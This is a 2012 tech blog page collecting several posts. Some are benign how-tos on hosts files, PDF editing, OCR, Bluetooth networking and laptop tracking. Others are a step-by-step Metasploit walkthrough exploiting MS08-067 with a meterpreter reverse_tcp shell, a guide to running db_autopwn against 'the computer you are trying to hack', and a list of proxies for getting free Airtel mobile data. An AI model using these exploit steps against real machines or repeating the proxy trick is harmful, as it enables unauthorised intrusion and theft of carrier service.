Tuesday, 4 September 2012

How to Use HOSTS File to Block or Redirect Unwanted Websites


Block Websites Using Hosts FileThe hosts file is one of the interesting and useful feature of both Windows and Linux operating systems that provides many handy options in addressing network nodes. For instance, you can use thehosts file to block annoying ads, pop-ups, banners, porn sites, or even redirect one website to another.
In this post I will show you how to play around with the hosts file to accomplish some of the above mentioned jobs.

What is a hosts File?

The hosts file is just like any other computer file that is used by the operating system to map hostnames and domain names on to their corresponding IP addresses.
In other words, when you type “google.com” on your browser’s address bar, your computer will look for the hosts file to see if it contains the corresponding IP address for the domain name you typed (google.com). In case if no entry is present in the hosts file, the request is then passed on to the DNS (Domain Name System) server to obtain the IP address.

hosts file vs. DNS

When it comes to resolving the hostnames, the hosts file is given the first priority over the Domain Name System. In most cases, the hosts file remains unconfigured on the operating system and hence the DNS is used by the computer to resolve the domain names to their corresponding IP addresses.
However, if the hosts file is found to contain a valid entry for a given hostname or domain name, then this is picked up and used by the operating system.

Where is the hosts File Located?

Windows: In case of the Windows operating system, the hosts file is located at:
%systemroot%\system32\drivers\etc\hosts
NOTE: In most cases this should be: C:\Windows\System32\drivers\etc\hosts
Unix/Linux: In case of Linux it is located at:
/etc/hosts

How to Block a Website?

To block a specific website, all you have to do is just add a new entry for that site in thehosts file. I would prefer to backup the original file and create a new one instead of modifying it. So, if something goes wrong, you can just delete it and restore the original one! Well, here is a step-by-step procedure on how to create a new hosts file on Windows:
  1. Go to “My Computer” and you should see the “Menu bar” on top. In case of Vista andWin 7, just click “Alt” to unhide the “Menu bar”.
  2. Now in the menu bar, click on “Tools -> Folder Options”. In the “View” tab uncheckthe option that says: “Hide extensions for known file types” and click on “OK”.
  3. Windows Folder Options
  4. Open a new text pad (New Text Document.txt) and rename it to: hosts. You will get a pop-up message with a warning. Just click on “Yes”.
    Please note that the renamed file hosts should not have any extension such as hosts.txt.
  5. Open the hosts file using the notepad. Now let us assume that you want to block the sites Facebook and Youtube on your computer. For this all you have to do is add the following lines to your hosts file:
    127.0.0.1       facebook.com
    127.0.0.1       www.facebook.com
    127.0.0.1       youtube.com
    127.0.0.1       www.youtube.com
    Each entry should be placed on an individual line. The IP address and the hostname should be separated by a space or a tab. In this way, you can block any given website by just pointing it to the IP address 127.0.0.1.
  6. Navigate to %systemroot%\system32\drivers\etc. Here you should see the originalhosts file, rename it to hosts_bak. Just copy and paste the new hosts file that you have created. That’s it. You’ve now successfully blocked those websites from loading on your computer.
    If you are using Vista/Win 7 you may have to take ownership of the originalhosts file before renaming it.

How to Redirect a Website?

Suppose you want to redirect Friendster.com to Google.com, all you have to do is just add the following lines to your hosts file:
74.125.236.72       friendster.com
74.125.236.72       www.friendster.com
Here 74.125.236.72 is the IP address of Google.com. To find out the IP address of any given website, just go to command prompt and ping it. For example: ping google.com. You should get a ping response that displays the IP address as shown below:
Ping Test
From now on, whenever you type “friendster.com” on your browser, you will be redirected to “google.com”.

How does hosts file work?

Whenever you block a website using the hosts file, you point it to the IP address 127.0.0.1which in fact is the IP address of your own computer. In other words, the IP 127.0.0.1 points to your own computer and doesn’t exist outside.
So, whenever you type the URL of a website for which an entry is present in the hosts file, your computer will load the IP as 127.0.0.1 instead of the actual one and tries to establish a connection with this IP address (127.0.0.1) but fails. As a result the website doesn’t load at all.
The redirection of the website works by pointing the domain name of one website to the IP address of another website (as configured by the hosts file) instead of it’s original IP address. So, whenever you type friendster.com, it is pointed to Google.com’s IP address and thus, the Google page loads up instead of the actual page from friendster.com.

How to Block the Annoying Ads?

I have found a great solution to keep all the annoying ads, banners, pop-ups and other parasites at bay by using a pre-configured hosts called MVPS hosts file. This hosts file contains a long list of entries to block all those annoying ads and pop-ups that usually load while you are surfing the Internet. You can also receive regular updates on this to stay up-to-date. You can download MVPS hosts file from the link below:
If you are playing around with the hosts file and something goes wrong, just delete thehosts file itself and rename the original file from hosts_bak to hosts. This should bring back everything to normal. I hope you like my post after a long gap. Waiting for your comments.

Sunday, 22 July 2012

How To Edit PDF Files


You’re probably sometimes downloaded a pdf document that you need to edit, it can be tricky because PDF files are “read only” by default. There are ways by which you can edit a PDF document for free .To help you out, I decided to provide you the list of top 3 free PDF editing software. Let’s begin with it.

1) Nitro PDF Professional

Nitro PDF Professional is PDF editor e that allows you to create, convert, edit, combine, secure, annotate, form-fill, and save 100% industry-standard PDF files… It worth to have ! Below you can download Nitro PDF Professional.
Features
-Create PDF
- Edit PDF
- Convert PDF
- Review & annotate PDF
- PDF forms
- Secure PDF
- Assemble & combine PDF

2) PDF-XChange Viewer

PDF-XChange Viewer is a free PDF editor/reader that allows you to view and edit PDFs, all from within an attractive and intuitive interface.

3) Inkscape

Inkscape is an open source vector graphics editor that can natively import and export PDF content.

How To Convert Image With Text Content Into Text Document


Want to to get rid of rewriting text files that was printed ? In this post I’m going to show you how to convert image with text Content into text document (.doc) by using free online service called onlineocr . It recognize text and characters from PDF scanned documents (including multipage files), photographs and digital camera captured images. Free Online OCR service supports 32 recognition languages.
1. Go to onlineocr.net
2. Choose file that you want to convert and click on Upload

3. Select language , output format and click on Recognize
4. After few seconds you’ll be able to download converted document

Thursday, 19 July 2012

How To Setup Direct LAN Connection Using Bluetooth


You may come in the situation when you’ve two computer but no WiFi adapters in it. In such condition you can try cheap method to share files between two computers using Bluetooth. In this tutorial I am going to teach you how to achieve such heights.
To allow file and printer sharing, name each computer with a unique name but give both computers the same workgroup name. You can do this from the System Properties window. To open System Properties, go to My computer, right click on any blank area and choose properties. Or simply you can right click on my computer icon and choose properties.
In Computer Name tab click Change to input your computer name and workgroup name. You will be asked to restart your computer after the computer name and workgroup change.
The computer name defined in this step becomes the Bluetooth device name for this computer that will be displayed on another computer this computer is discovered.
Now plug in Bluetooth adapters to both of your computer. Make sure that Bluetooth device is properly installed on both of your PC’s properly by going to device manager.
Verify that the Bluetooth adapter is identified as a Bluetooth Network Connection under Personal Area Network with Microsoft’s Bluetooth stack driver while on the second computer with third-party Bluetooth stack driver; it is identified as a Local Area Connection under LAN or High-Speed Internet.
Make the second Bluetooth-enabled computer discoverable by going to Bluetooth settings and configure its “service properties” to include PAN Networking service.
In the first computer, right click on Bluetooth taskbar icon and select “Join a Personal Area Network” to open Bluetooth Personal Area Network window.
You can also do this by going to Network Connections and right-clicking the icon and select “View Bluetooth Network Devices” or clicking View Bluetooth Network Devices link on the left sidebar.
On the Bluetooth Personal Area Network window, click “Add” to open the “Add Bluetooth Device Wizard” if the second computer hasn’t been connected before.
Now we’re done with setting up the basic things. Now we’ll have to pair the devices.
On the Add Bluetooth Device Wizard, tick “My device is set up and ready to be found”. Click Next.
Wizard will search for Bluetooth devices in range.
Select the second computer and click next.
You will be asked to input a passkey or PIN code before starting a connection to the second computer. You can create your own passkey or let Windows create a random passkey for you. Click Next.
On the second computer, you will be prompted to input a passkey. Type the same passkey as the one created on the first computer and cick OK.
If the everything went well, you’ll be welcomed to next page with Finish button enabled. Click Finish. You will be back to the Bluetooth Personal Area Network window. Now the second computer is listed under Direct Connections. Select it and click Connect to start a Personal Area Network connection.
Now, both computers have been directly connected in a Personal Area Network. First computer with Microsoft stack is the Client while the second one with Thirdparty stack is the host.
Now you can share files same like in LAN but with slower bandwidth
Hope this tutorial was helpful

How to track your stolen laptop for free


In this post I will show you how to use free software called Prey , that allows you to remotely monitor your stolen laptop, retrieving screenshots, webcam pictures, and Wi-Fi hotspot information that you (and the police) can use to track down your property.
1) Download Prey from this LINK and install it on your laptop .
2) After installation you’ll received activation email , click on activation link
3) If your laptop is stolen , then log in in your Prey account and select Missing option on YES , it informs Prey to generate and send a report next time it runs.
Reports contains geo-location of your stolen laptop , the network status , such as the device’s MAC and it’s public and private IP addresses and more..

Saturday, 14 July 2012

[Metasploit Tutorial] Hacking Windows XP using IP Address

Do you think it is possible to hack some one computer with just an ip address?! The answer is yes, if you are using unpatched(vulnerable) OS.  If you don't believe me, then read the full article.

In this article i am going to demonstrate how to hack a remote computer by exploiting the  parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service(CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server Service Vulnerability.

Details about Server Service Vulnerability(MS08-067):
Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.

The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The 'NetprPathCanonicalize()' function in the 'netapi32.dll' file is affected.

A malicious request to vulnerable system results in complete compromise of vulnerable computers.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.

Exploiting the MS08-067 using Metasploit:

Requirements:

  • VirtualBox
  • Backtrack 5
  • Target OS(XP)
Step 1:

Create Two Virtual Machine(VM) namely "Target" and "BT5".  Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.

If you don't know how to create virtual machines , then please read this VirtualBox Manual.

Step 2: Find the IP address of Target
Open The command prompt in the Target machine(XP). Type "ipconfig" to find the IP address of the Target system.

Hackers use different method for finding the ip address of victim.  For Eg., By sending link that will get the ip  details or use Angry IP Scanner.

Step 3: Information Gathering
Now let us collect some information about the Target machine.  For this purpose , we are going to use the nmap tool.

Open The Terminal in the BT5 machine(Backtrack) and type "nmap -O 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.


Step 4: Metasploit
Now open the Terminal in the BT5 machine(Backtrack) and Type "msfconsole".

The msfconsole is the most popular interface to the Metasploit Framework. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Let us use the Search command to find the exploit modules with the keyword netapi. Type "search netapi".  Now you can see the list of modules match with the netapi.


We are going to exploit MS08-067 , so type "use exploit/windows/smb/ms08_067_netapi".

Step 5: Set Payload
As usual, let use the Reverse Tcp Payload for this exploit also. Type "set payload windows/meterpreter/reverse_tcp" in the msfconsole.

Step 6: Options
Type "set LHOST 192.168.56.10".  Here 192.168.56.10 is IP address of Backtrack machine.  You can find the ip address by typing 'ifconfig' command in the Terminal.

Type "set RHOST 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine.

Step 7: Exploiting
Ok, it is time to exploit the vulnerability, type "exploit" in the console. If the exploit is successful, you can see the following result.

Now we can control the remote computer using the meterpreter. For example, typing "screenshot" will grab the screenshot of the victim system.

Wednesday, 9 May 2012

How To Hack A Remote Computer Using IP Address

Step 1: First you need to download Metasploit. The most up-to-date version is FREE atmetasploit.com.

Step 2: You need PostgrSQL for your database. Download here: http://www.postgresql.org/. Make sure you use all the defaults or Metasploit woun't work!

Step 3: Now lets get down to buisness... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...


Step 4: Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui. Let it load untill it look like this:


Step 5: Now, in the window type:

db_connect postgres:ThePassYouChose@localhost:5432

The first time you do this you will see lots of text flash buy. Don't wory, this is normal.

Step 6: Type db_host to make sure you are connected correctally.

Step 7: Now type this:

db_nmap 000.000.000.000

Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...

Step 8: Now we get to the fun part; the automatic exploitation. Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, go play Halo for a while, and then come back...

Step 9: After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.

Step 10: Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:

Wednesday, 29 February 2012

Airtle proxy hacking for free downloading | Airtel hack 2012


Today I am sharing one of the best, fastest and resume supported Proxy for free downloading and browsing Using Airtel. 

A successful free Airtel hack 2012.


This Airtel trick works on mobile as well as PC by using 2G or 3G network as per your like.


** Now go with the Airtel trick **.

Start Mozilla firefox > advanced > setting > manual proxy setting > write proxy and port.

Now do to the Generat > Home page and Put “ fb.me “ .

Remember Use it only when u have below 0.30Rs balance Or 0Rs Balance.

proxy = 72.9.152.75/65.110.6.44

Port = 80

Home Page = fb.me


Now for opening SSL site with very fast browsing and downloading with resume support. Go with this Airtel proxy. You can also open facebook.com, gmail.com, mediafire and so no.

PROXY = 209.97.221.88

PORT = 80

HP = fb.me

Put it on url google.com then go with your site. 


Other proxies for Airtel hack.

Proxy = 208.53.153.186

port = 80

HP = fb.me



Proxy = 82.192.79.139

Port = 80

HP = fb.me

m.twitter.com
0.facebook.com   


Proxy = 68.169.45.129

Port = 80

HP = fb.me or other free site that you know work in ur state.


Proxy with IDM Support :

Proxy = 31.193.139.10

Port = 80

HP = fb.me